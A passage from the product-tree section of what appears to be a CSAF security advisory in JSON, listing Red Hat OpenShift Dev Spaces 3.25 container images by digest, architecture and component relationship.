"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3Ab8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765406925"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3A0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247198"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3A969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3A804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765354572"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3Acfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892891"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765246979"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"product": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256%3A84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764891834"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3A31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765276570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765325702"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3A4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765299828"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765225950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3Ae9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892466"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765582207"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3Aa63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765503811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765406925"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64 as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le as a component of Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
